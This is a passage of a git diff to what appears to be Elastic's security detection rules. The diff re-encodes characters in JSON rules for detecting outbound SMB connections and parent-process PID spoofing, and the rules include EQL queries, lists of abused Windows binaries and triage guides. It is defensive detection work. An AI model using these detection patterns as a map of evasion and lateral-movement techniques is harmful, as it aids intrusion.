involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.pid != 4 and\n not (process.executable : \"D:\\\\EnterpriseCare\\\\tools\\\\jre.1\\\\bin\\\\java.exe\" and process.args : \"com.emeraldcube.prism.launcher.Invoker\") and\n not (process.executable : \"C:\\\\Docusnap 11\\\\Tools\\\\nmap\\\\nmap.exe\" and process.args : \"smb-os-discovery.nse\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent *\\\\Ranger\\\\SentinelRanger.exe\",\n \"?:\\\\Program Files\\\\Ivanti\\\\Security Controls\\\\ST.EngineHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Fortinet\\\\FSAE\\\\collectoragent.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Azure Advanced Threat Protection Sensor\\\\*\\\\Microsoft.Tri.Sensor.exe\",\n \"?:\\\\Program Files\\\\CloudMatters\\\\auvik\\\\AuvikService-release-*\\\\AuvikService.exe\",\n \"?:\\\\Program Files\\\\uptime software\\\\uptime\\\\UptimeDataCollector.exe\",\n \"?:\\\\Program Files\\\\CloudMatters\\\\auvik\\\\AuvikAgentService.exe\",\n \"?:\\\\Program Files\\\\Rumble\\\\rumble-agent-*.exe\")]\n [network where host.os.type == \"windows\" and destination.port == 445 and process.pid != 4 and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n", "related_integrations": [ { @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_107.json b/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_107.json index d6830d8f57c..c171d107b24 100644 --- a/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_107.json +++ b/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_107.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Direct Outbound SMB Connection", - "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate port scanners, exploits, and tools used to move laterally on the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate port scanners, exploits, and tools used to move laterally on the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.pid != 4 and\n not (process.executable : \"D:\\\\EnterpriseCare\\\\tools\\\\jre.1\\\\bin\\\\java.exe\" and process.args : \"com.emeraldcube.prism.launcher.Invoker\") and\n not (process.executable : \"C:\\\\Docusnap 11\\\\Tools\\\\nmap\\\\nmap.exe\" and process.args : \"smb-os-discovery.nse\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent *\\\\Ranger\\\\SentinelRanger.exe\",\n \"?:\\\\Program Files\\\\Ivanti\\\\Security Controls\\\\ST.EngineHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Fortinet\\\\FSAE\\\\collectoragent.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Azure Advanced Threat Protection Sensor\\\\*\\\\Microsoft.Tri.Sensor.exe\",\n \"?:\\\\Program Files\\\\CloudMatters\\\\auvik\\\\AuvikService-release-*\\\\AuvikService.exe\",\n \"?:\\\\Program Files\\\\uptime software\\\\uptime\\\\UptimeDataCollector.exe\",\n \"?:\\\\Program Files\\\\CloudMatters\\\\auvik\\\\AuvikAgentService.exe\",\n \"?:\\\\Program Files\\\\Rumble\\\\rumble-agent-*.exe\")]\n [network where host.os.type == \"windows\" and destination.port == 445 and process.pid != 4 and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n", "related_integrations": [ { @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_101.json b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_101.json index 6080d4808e3..97df0771f49 100644 --- a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_101.json +++ b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_101.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "c85eb82c-d2c8-485c-a36f-534f914b7663", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_102.json b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_102.json index d198eb74018..3aa0afe6e02 100644 --- a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_102.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "c85eb82c-d2c8-485c-a36f-534f914b7663", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_103.json b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_103.json index 37c2cea003f..edbec378c68 100644 --- a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_103.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "c85eb82c-d2c8-485c-a36f-534f914b7663", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_104.json b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_104.json index 2888442c7fa..8efa8535094 100644 --- a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_104.json @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "c85eb82c-d2c8-485c-a36f-534f914b7663", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_102.json b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_102.json index 4fbf1e96467..2bd7961bf6f 100644 --- a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_102.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Parent Process PID Spoofing", - "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid \u003e 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid > 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", "references": [ "https://blog.didierstevens.com/2017/03/20/" ], @@ -100,7 +100,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_103.json b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_103.json index cb3b6192e40..5819f7a1e32 100644 --- a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_103.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Parent Process PID Spoofing", - "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid \u003e 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid > 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", "references": [ "https://blog.didierstevens.com/2017/03/20/" ], @@ -99,7 +99,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_104.json b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_104.json index 8886fa18aaf..195311aab4a 100644 --- a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_104.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Parent Process PID Spoofing", - "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid \u003e 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n 